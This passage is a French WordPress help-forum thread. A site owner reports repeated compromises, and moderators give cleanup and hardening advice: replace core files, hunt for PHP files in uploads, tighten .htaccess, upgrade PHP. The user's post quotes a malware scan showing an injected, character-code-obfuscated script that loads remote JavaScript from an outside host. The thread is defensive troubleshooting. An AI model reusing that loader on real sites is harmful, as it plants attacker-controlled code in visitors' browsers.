Malware présent: comment le supprimer ?

  • WordPress :5.2
  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 36)
  • Auteur
    Messages
  • #2281871
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    Bonjour,

    Ma configuration WP actuelle

    • Version de PHP/MySQL : 7.2/MySQL:5.6
    • Thème utilisé : Wallstreet
    • Extensions en place : Akismet Antispam, Blogdesigner, Classic editor, Formidable forms, Google language translator, Media library assistant, Re-add text justify button, Slider images, Tablepress, Wordfence security,
    • Nom de l’hébergeur : OVH
    • Adresse du site :

    Problème(s) rencontré(s) : piratages réguliers (modifications de fichiers signalées par Wordfence)

    Bonjour,

    Tous les plugins sont en dernière version, mais je suis régulièrement piraté: Wordfence m’informe que des fichiers ont été modifiés ou que des fichiers inconnus sont présents.

    Hier j’ai restauré une sauvegarde fonctionnelle, puis je suis allé sur le site https://sitecheck.sucuri.net/ pour faire un scan de mon site et essayer de trouver la cause, lequel a donné de mauvais résultats, “malware found”, et voici ce qu’il me dit:

    URL de mon site:

    </style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 100, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 100, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 101, 97, 103, 108, 101, 108, 111, 99, 97, 116, 105, 111, 110, 46, 120, 121, 122, 47, 115, 116, 97, 116, 115, 46, 106, 115, 39, 59, 10, 100, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 100, 41, 59));</script>

    ce message est répété plusieurs fois pour plusieurs pages du site : donc plusieurs pages doivent être infectées…

    Je ne suis pas un expert, mais j’imagine qu’il faudrait trouver cette saleté et la supprimer par FTP ? et bien sûr je ne me vois pas refaire une install en repartant de zéro…

    Merci pour vos conseils,

    P.S.: dois-je donner l’URL de mon site (ça faciliterait la tâche aux petits plaisantins non ?)

     

    #2281877
    momofr@free.fr
    Modérateur
    Maître WordPress
    2716 contributions

    Salut, tu as Wordfence et ce dernier ne t’as pas prévenu de cette intrusion ? Tu ne dois pas avoir une configuration correctement paramétrée, ça aurait dû remonter et la suppression des fichiers ou leur correction serait possible avec cette extension.

    Sans le message complet de Sucuri on ne vas pas pouvoir t’aider, tu dois suivre les instruction, les URL des fichiers infectés doivent être affichées.

    #2281892
    PhiLyon
    Modérateur
    Maître WordPress
    23948 contributions

    Bonjour.

    Donnes-nous l’url en réponse privée (case à cocher en dessous de l’éditeur)

    🙂

    #2281919
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions
    Cette réponse a été marquée comme privée.
    #2281920
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    voilà: je viens d’envoyer l’URL en réponse privée (je ne savais pas que c’était possible),

    et @ momofr: Wordfence me prévient bien des tentatives d’intrusion et des fichiers infectés ou modifiés, mais je n’ai aucune idée de comment je peux me faire pirater… Les passwords sont costauds, les plugins toujours à jour, etc…

    Ce site ne permet pas l’inscription de membres.

    #2281934
    momofr@free.fr
    Modérateur
    Maître WordPress
    2716 contributions

    Salut, Wordfence te permet de supprimer les fichiers infectés normalement. Ici c’est un injection via javascript, c’est possible via une de tes extensions. Ça semble ne toucher que certaines pages.
    – Tu as du mixed content (rien de grave mais à résoudre)
    – Tu es sous PHP 7.2, il faut passer sous 7.3

    Je te conseille de bétonner la sécurité des fichiers sensibles via htaccess.

    Essaye de voir si l’extension MalCare te permet de savoir où sont les injections et les supprimer.

    Sinon tu as la solution bourrin qui consiste à écraser les fichiers WordPress via FTP (sauf le fichier wp-config.php et le dossier wp-content) et le dossier du thème, si les hacks sont dans ses fichiers ça va les supprimer.

    Pour le dossier wp-content -> uploads, vérifie qu’il n’y a pas de fichier php dans ce dossier et ses sous-dossiers, il ne doit y en avoir.

    Bon courage.

    #2282028
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    Merci momofr !

    J’ai adopté la solution bourrin, car ce site là ne bouge quasiment pas (c’est simplement une vitrine) et c’était donc le plus simple: j’ai restauré une sauvegarde de l’ensemble du site que je sais fonctionner.

    Cela étant, comme elle est infectée, ce n’est pas top, et tu as raison: je vais bétonner la protection par htaccess: je viens de télécharger le doc de la Marmitte et je bosse dessus.

    L’extension MalCare dont tu parles est payante: pas rentable pour ce site… connais-tu un autre moyen gratuit ?

    Et pour passer de php 7.2 en 7.3, y’a un moyen simple ? car je ne suis pas du tout un expert de PHP, même si je touche ma bille en info…

    Lorsque j’aurai résolu les problèmes pour ce site, je travaillerai sur mon autre site, qui lui est beaucoup plus gros, et qui est aussi piraté régulièrement, ce qui pose de gros problèmes vu la taille et le nombre de visiteurs…

    Merci !

    #2282030
    Li-An
    Modérateur
    Maître WordPress
    22703 contributions

    Bonjour, il faut aussi vérifier que les appareils que vous utilisez pour vous connecter en tant qu’admin sont clean.

    #2282032
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions
    Cette réponse a été marquée comme privée.
    #2282034
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    A priori les appareils ont clean, mais je vais les rescanner cet après-midi.

    Je viens déjà de modifier le htaccess de la racine, et je vous l’ai envoyé en P.J. en conversation privée: malheureusement l’accès au site est impossible depuis que je l’ai mis en place, mais le problème doit être très basique…. si vous pouvez y jeter un coup d’oeil pour débloquer les accès…

    Merci !

    #2282036
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    Je m’aperçois que j’ai fait de grosses bêtises dans mon htaccess: je suis en train de le reprendre puis je reviens vers vous (désolé…)

    Edit de 13h50: j’ai repris le htaccess (celui de la racine) pas à pas, et désormais tout fonctionne !

    Je m’attaque maintenant aux autres htaccess des répertoires critiques.

    #2282037
    momofr@free.fr
    Modérateur
    Maître WordPress
    2716 contributions

    Salut, pour passer en PHP 7.3 c’est dans ta console OVH, tu vas sur Hébergement -> Ton nom de domaine -> Version PHP, là tu mets en PHP 7.3 stable.

    Attention, tu ne dois pas mettre ce htaccess comme ça, il y a des choses spécifiques qui ne te concerne certainement pas.
    Si tu n’y comprend rien ne t’en occupe pas comme ça, met juste les règles de sécurité de base :

    • # Éviter le spam de commentaires
    • # Éviter que l’on découvre l’identifiant d’un auteur
    • # Protéger les fichiers .htaccess et .htpasswds
    • # Protéger le fichier wp-config.php
    • # Désactiver l’affichage du contenu des répertoires
    • # Protections diverses (XSS, clickjacking et MIME-Type sniffing)

    Tout ce qui est compression est accessoire et pas indispensable. Sinon contacte-moi en MP.

    #2282038
    momofr@free.fr
    Modérateur
    Maître WordPress
    2716 contributions
    Cette réponse a été marquée comme privée.
    #2282044
    nounours18200@yahoo.fr
    Participant
    Initié WordPress
    25 contributions

    Merci momofr: tu es vraiment super !

    Je ne comprends pas tout, mais assez pour voir que je l’avais juste recopié sans rien changer, ce qui est évidemment stupide… depuis je l’ai repris en mettant en commentaire ce qui ne m’est pas utile (je comprends suffisamment pour cela), et ça va bien pour le htaccess de la racine.

    Je fais les autres .htaccess maintenant.

    Ensuite je te contacte en MP pour mon gros site, car c’est surtout ce dernier qui nous pose des soucis…

     

    #2282054
    momofr@free.fr
    Modérateur
    Maître WordPress
    2716 contributions

    Salut, OK, pour ce qui est du hackage des sites il faut comprendre que si tu es sur un même hébergement avec plusieurs sites, il suffit que l’un d’eux ai une faiblesse (une extension par exemple) pour que le script malicieux touche TOUS les sites présents sur l’hébergement (OVH mutu par exemple).

    Donc chercher la solution sur un seul site n’est la bonne démarche, il faut vérifier tous les sites et les dossiers.

15 sujets de 1 à 15 (sur un total de 36)
  • Vous devez être connecté pour répondre à ce sujet.